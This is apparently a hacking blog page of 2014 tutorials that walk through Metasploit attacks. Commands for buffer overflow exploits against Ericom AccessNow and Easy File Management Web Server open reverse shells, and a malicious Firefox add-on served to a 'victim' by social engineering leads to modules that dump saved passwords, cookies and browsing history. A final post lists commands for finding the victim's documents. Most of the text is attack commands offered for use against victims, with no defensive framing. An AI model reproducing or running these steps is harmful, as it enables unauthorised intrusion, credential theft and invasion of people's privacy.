Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

at 7:50 AM Thursday, June 26, 2014 0 comments
This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2.

Exploit Targets
Ericom AccessNow Server 2.4.0.2

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole


Now type use exploit/windows/http/ericom_access_now_bof
msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ericom_access_now_bof)>set lhost 192.168.1.8 (IP of Local Host)
msf exploit (ericom_access_now_bof)>set rhost 192.168.1.2 (IP of Remote PC)
msf exploit (ericom_access_now_bof)>exploit


Labels: ,

Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

at 5:58 AM Friday, June 20, 2014 0 comments
Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.

Exploit Targets
Easy File Management Web Server v5.3

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/http/efs_fmws_userid_bof
msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)
msf exploit (efs_fmws_userid_bof)>exploit


Labels: ,

Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC

at 7:12 PM Friday, June 13, 2014 0 comments
Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC


Once we have the shell, we simply run the post module to dump the credentials to a file

How to Gather History

Now type use post/firefox/gather/history
msf exploit (history) set payload firefox/shell_reverse_tcp
msf exploit (history)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (history)>set session 1
msf exploit (history)>exploit   


Result will stored on your local computer
/root/.msf4/loot/
A look at the result, you will see data like


How to Gather Cookies

Once we have the shell, we simply run the post module to dump the credentials to a file

Now type use post/firefox/gather/cookies
msf exploit (cookies) set payload firefox/shell_reverse_tcp
msf exploit (cookies)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit  


Result will stored on your local computer
/root/.msf4/loot/

Labels: ,

Hack Save Password in Mozilla Firefox in Remote Windows, Linux or MAC PC

at 8:11 PM Thursday, June 12, 2014 0 comments
Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC


Once we have the shell, we simply run the post module to dump the credentials to a file

Now type use post/firefox/gather/passwords
msf exploit (passwords) set payload firefox/shell_reverse_tcp
msf exploit (passwords)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (passwords)>set session 1
msf exploit (passwords)>exploit  

Result will stored on your local computer
/root/.msf4/loot/

A look at the result, you will see data like
Labels: ,

How to Find ALL Excel, Office, PDF, and Images Files in Remote PC

at 1:05 PM Wednesday, June 11, 2014 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Find ALL MS Excel Files

This command will search through all subdirectories below for a file that matches that file name

Type dir *.xls /s


Find ALL MS office Files

This command will search through all subdirectories below for a file that matches that file name

Type dir *.doc /s


This command will search through all subdirectories below for a file that matches that file name

Type dir *.exe /s


 This command will search through all subdirectories below for a file that matches that file name

Type dir *.jpg /s


This command will search through all subdirectories below for a file that matches that file name

Type dir *.pdf /s

Labels: ,
Subscribe to: Posts (Atom)